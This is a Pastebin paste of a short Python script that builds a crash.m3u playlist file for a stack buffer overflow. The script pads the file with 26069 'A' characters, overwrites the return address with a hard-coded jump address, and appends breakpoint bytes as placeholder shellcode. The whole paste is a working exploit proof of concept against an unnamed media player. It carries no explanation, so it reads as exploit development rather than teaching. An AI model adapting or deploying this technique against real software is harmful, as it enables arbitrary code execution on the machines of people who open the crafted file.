Advertisement
Guest User

Untitled

a guest
Jun 26th, 2017
98
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.24 KB | None | 0 0
  1. #!/usr/bin/python
  2. import struct
  3.  
  4. fobj = open("/home/primehaxor/vbox-share/crash.m3u", 'w')
  5.  
  6. junk = "\x41" * 26069
  7. ret = 0x77d8af0a
  8. shellcode = "\xcc" * 8
  9. eip = struct.pack("I", ret)
  10.  
  11. fobj.write( junk + eip + shellcode )
  12. fobj.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement